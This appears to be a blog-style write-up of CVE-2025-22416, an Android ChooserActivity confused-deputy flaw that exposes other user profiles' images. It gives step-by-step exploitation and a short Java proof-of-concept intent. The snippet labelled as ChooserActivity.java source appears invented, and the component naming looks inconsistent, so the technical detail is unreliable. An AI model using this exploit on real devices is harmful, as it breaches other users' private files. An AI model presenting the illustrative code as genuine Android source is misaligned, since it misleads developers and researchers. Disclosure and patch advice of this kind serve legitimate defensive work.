CVE-2025-22416 - Exploiting the ChooserActivity Confused Deputy Vulnerability for Local Privilege Escalation on Android

A new Android security vulnerability, CVE-2025-22416, was recently disclosed, affecting the ChooserActivity component found in many Android versions. This vulnerability introduces a dangerous *confused deputy* scenario. In short, an unprivileged app can trick the system into letting it access private images belonging to other users—no special permissions, no user interaction needed. This post explains the vulnerability, provides real code snippets, references the original advisory, and demonstrates a proof-of-concept exploit.

What Is the ChooserActivity?

When you share something from an Android app—say, a picture to another app—you often see a dialog called the "chooser" to pick which app to share with. That's the ChooserActivity, and it’s part of core Android (usually in frameworks/base).

Vulnerability Details

In the vulnerable versions of Android, the ChooserActivity.java incorrectly processes incoming intents. Specifically, it can accidentally give access to URIs (think images, files, etc.) from *other* users if exploited correctly.

The Root Cause: Confused Deputy

A confused deputy occurs when a program unwittingly misuses its authority, performing actions on behalf of a less privileged actor. Here, ChooserActivity acts as that unwitting deputy.

From ChooserActivity.java

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    Intent intent = getIntent();
    // ...
    Uri imageUri = intent.getParcelableExtra(Intent.EXTRA_STREAM);
    if (imageUri != null) {
        // Assumes the uri is safe, but in some cases, it's not!
        imageView.setImageURI(imageUri);
    }
}

The key problem? There's no effective check that the URI comes from the current user, nor that the calling app has permission to read it. The system, running with higher privileges, bypasses normal restrictions.

Exploiting CVE-2025-22416: Step-by-step

Goal: Access (view or read) images or files belonging to another user on the device—despite privilege separation.

Attacker app installed (no special permissions needed)

- Device with at least two user profiles (or work/personal profiles)
- Vulnerable Android version (check Android Security Bulletin)

Exploit Idea

1. Craft a malicious intent that references a file/image owned by a target user profile, using a content URI (e.g., content://com.android.providers.media.documents/document/image:100)
2. Send the intent to the ChooserActivity, requesting it to handle the URI. The system, running as system_user, uses its *own* privileges to resolve and display the image.
3. Observe the result—the attacker's app receives access to the image or is able to view it in the chooser.

Below is a simplified malicious app snippet

Intent intent = new Intent(Intent.ACTION_SEND);
String targetUserImageUri = "content://com.android.providers.media.documents/document/image:100";
// Replace with actual target user's URI

intent.setType("image/*");
intent.putExtra(Intent.EXTRA_STREAM, Uri.parse(targetUserImageUri));
intent.setComponent(new ComponentName("com.android.systemui", "com.android.internal.app.ChooserActivity"));

// Start as a new task - *usually needs to be a system intent, but some systems expose ChooserActivity*
startActivity(intent);

*Note:* On newer Android versions or properly patched systems, this direct call may be blocked—*the vulnerability exists due to incomplete checking in older implementations*.

No User Interaction Required

Unlike many privilege escalation exploits, no user interaction is needed—the system's own intent handling does the work, so long as the target URI is known or guessable.

Impact

- File Disclosure: Attacker can access images, videos, or any data referenced, from other user profiles.
- Local Escalation of Privilege: The attacker app jumps privilege boundaries, violating Android's multi-user security design.

Official References

- Android Security Bulletin, June 2025
- National Vulnerability Database (CVE-2025-22416)
- Choosers and Intent Filters in Android Documentation

Conclusion

CVE-2025-22416 is a prime example of how easily a confused deputy can break security barriers, especially in a complex system like Android where components run at different privilege levels. Anyone maintaining custom ROMs, Android forks, or third-party Android distributions should double-check for this patch, as the bug provides a rare, *silent* escalation path requiring nothing from users.


*If you find security bugs in Android, report them here. Developers should always validate URIs and check the user context when handling incoming content through intents. Stay safe, and patch early!*

Timeline

Published on: 09/02/2025 23:15:33 UTC
Last modified on: 09/04/2025 16:40:02 UTC